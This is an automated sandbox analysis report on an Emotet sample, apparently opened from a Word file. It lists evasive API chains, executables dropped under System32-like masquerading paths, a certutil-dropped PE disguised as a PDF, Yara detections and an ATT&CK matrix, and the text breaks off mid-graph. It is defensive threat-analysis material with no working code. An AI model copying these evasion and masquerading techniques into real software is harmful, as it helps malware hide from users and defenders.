                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: sample1.docStream path 'Data' entropy: 7.97862280177 (max. 8.0)

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_8-10326
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_11-6273
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_9-6248
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_12-6248
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_13-6363
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_10-6366
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: ChangeServiceConfig2W,OpenServiceW,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,8_2_007A5040
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,9_2_002A5040
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,10_2_003D5040
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,11_2_003E5040
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,12_2_002C5040
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,13_2_002A5040
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,14_2_00485040
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,15_2_003E5040
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,16_2_00315040
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeWindow / User API: threadDelayed 9685Jump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeWindow / User API: threadDelayed 520Jump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeWindow / User API: threadDelayed 9480Jump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeWindow / User API: threadDelayed 9670Jump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeWindow / User API: threadDelayed 9939Jump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeWindow / User API: threadDelayed 9873Jump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeWindow / User API: threadDelayed 9910Jump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeWindow / User API: threadDelayed 9880Jump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeWindow / User API: threadDelayed 9895Jump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeWindow / User API: threadDelayed 9790Jump to behavior
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeWindow / User API: threadDelayed 463
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeWindow / User API: threadDelayed 9537
                      Source: C:\Windows\System32\certutil.exeDropped PE file which has not been started: C:\Users\Public\Ksh1.pdfJump to dropped file
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe TID: 1688Thread sleep count: 520 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe TID: 1688Thread sleep count: 9480 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe TID: 2192Thread sleep count: 9670 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe TID: 2192Thread sleep count: 330 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe TID: 2032Thread sleep count: 9939 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe TID: 2032Thread sleep count: 61 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exe TID: 2516Thread sleep count: 9873 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exe TID: 2516Thread sleep count: 127 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exe TID: 1236Thread sleep count: 9880 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exe TID: 1236Thread sleep count: 120 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exe TID: 2316Thread sleep count: 9895 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exe TID: 2316Thread sleep count: 105 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe TID: 2092Thread sleep count: 9790 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe TID: 2092Thread sleep count: 210 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exe TID: 2084Thread sleep count: 463 > 30
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exe TID: 2084Thread sleep count: 9537 > 30
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,8_2_007A38F0
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,9_2_002A38F0
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_003D38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,10_2_003D38F0
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003E38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,11_2_003E38F0
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002C38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,12_2_002C38F0
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_002A38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,13_2_002A38F0
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_004838F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,14_2_004838F0
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003E38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,15_2_003E38F0
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_003138F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,16_2_003138F0
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_003238F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,17_2_003238F0
                      Source: jsproxy.exe, 0000000D.00000002.2306173765.000000000034F000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: jsproxy.exe, 0000000D.00000002.2306173765.000000000034F000.00000004.00000020.sdmpBinary or memory string: PPTP00VMware_S
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A4DF0 mov eax, dword ptr fs:[00000030h]8_2_007A4DF0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A3F00 mov eax, dword ptr fs:[00000030h]8_2_007A3F00
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A3F00 mov eax, dword ptr fs:[00000030h]9_2_002A3F00
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A4DF0 mov eax, dword ptr fs:[00000030h]9_2_002A4DF0
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_003D3F00 mov eax, dword ptr fs:[00000030h]10_2_003D3F00
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_003D4DF0 mov eax, dword ptr fs:[00000030h]10_2_003D4DF0
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003E3F00 mov eax, dword ptr fs:[00000030h]11_2_003E3F00
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003E4DF0 mov eax, dword ptr fs:[00000030h]11_2_003E4DF0
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002C3F00 mov eax, dword ptr fs:[00000030h]12_2_002C3F00
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002C4DF0 mov eax, dword ptr fs:[00000030h]12_2_002C4DF0
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_002A3F00 mov eax, dword ptr fs:[00000030h]13_2_002A3F00
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_002A4DF0 mov eax, dword ptr fs:[00000030h]13_2_002A4DF0
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_00483F00 mov eax, dword ptr fs:[00000030h]14_2_00483F00
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_00484DF0 mov eax, dword ptr fs:[00000030h]14_2_00484DF0
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003E3F00 mov eax, dword ptr fs:[00000030h]15_2_003E3F00
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003E4DF0 mov eax, dword ptr fs:[00000030h]15_2_003E4DF0
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_00313F00 mov eax, dword ptr fs:[00000030h]16_2_00313F00
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_00314DF0 mov eax, dword ptr fs:[00000030h]16_2_00314DF0
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00323F00 mov eax, dword ptr fs:[00000030h]17_2_00323F00
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00324DF0 mov eax, dword ptr fs:[00000030h]17_2_00324DF0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A9860 GetModuleFileNameW,SHGetFolderPathW,SHGetFolderPathW,OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,SHGetFolderPathW,SHGetFolderPathW,8_2_007A9860
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess created: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess created: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess created: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess created: C:\Windows\SysWOW64\mfc110fra\mobsync.exe C:\Windows\SysWOW64\mfc110fra\mobsync.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess created: C:\Windows\SysWOW64\capisp\jsproxy.exe C:\Windows\SysWOW64\capisp\jsproxy.exeJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess created: C:\Windows\SysWOW64\riched20\dllhost.exe C:\Windows\SysWOW64\riched20\dllhost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess created: C:\Windows\SysWOW64\KBDMLT47\apds.exe C:\Windows\SysWOW64\KBDMLT47\apds.exeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess created: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess created: C:\Windows\SysWOW64\osk\rasadhlp.exe C:\Windows\SysWOW64\osk\rasadhlp.exeJump to behavior
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A80A0 SetFileInformationByHandle,GetSystemTimeAsFileTime,_snwprintf,GetProcessHeap,HeapFree,CreateFileW,CreateFileW,CloseHandle,8_2_007A80A0
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_003253D0 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,17_2_003253D0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2429576153.0000000000534000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2283230034.0000000000358000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2292525309.00000000005E6000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2321415982.0000000000536000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2287635770.0000000000356000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2284485202.0000000000906000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.2277604506.0000000000908000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.2321112470.0000000000578000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2306168879.0000000000538000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2296618832.00000000005D6000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2310473820.0000000000648000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2315225501.0000000000538000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.2301449687.0000000000338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2305771628.00000000002F4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.2287962636.00000000005E8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2309893480.00000000004F4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2296898550.0000000000608000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2314627073.0000000000646000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2301536313.00000000005C4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.2292414535.00000000005D8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 11.2.NlsLexicons0416.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tmp_e473b4.exe.7a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.jsproxy.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.apds.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.WPDShextAutoplay.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rasadhlp.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.shellstyle.exe.3d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.upnp.exe.310000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.mobsync.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.dllhost.exe.480000.2.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Windows Service12Windows Service12Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsScripting12Boot or Logon Initialization ScriptsProcess Injection11Scripting12LSASS MemorySystem Service Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information21Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution11Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSystem Information Discovery17Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter1Network Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSecurity Software Discovery111SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaService Execution11Rc.commonRc.commonMasquerading231Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 339440 Sample: sample1.bin Startdate: 14/01/2021 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 11 other signatures 2->71 14 tmp_e473b4.exe 3 2->14         started        17 certutil.exe 2 2->17         started        20 WINWORD.EXE 386 41 2->20         started        22 svchost.exe 2->22         started        process3 file4 109 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 14->109 111 Drops executables to the windows directory (C:\Windows) and starts them 14->111 113 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->113 24 WPDShextAutoplay.exe 2 14->24         started        51 C:\Users\Public\Ksh1.pdf, PE32 17->51 dropped 115 Drops PE files to the user root directory 17->115 signatures5 process6 signatures7 85 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 24->85 87 Drops executables to the windows directory (C:\Windows) and starts them 24->87 89 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->89 27 shellstyle.exe 2 24->27         started        process8 signatures9 97 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 27->97 99 Drops executables to the windows directory (C:\Windows) and starts them 27->99 101 Hides that the sample has been downloaded from the 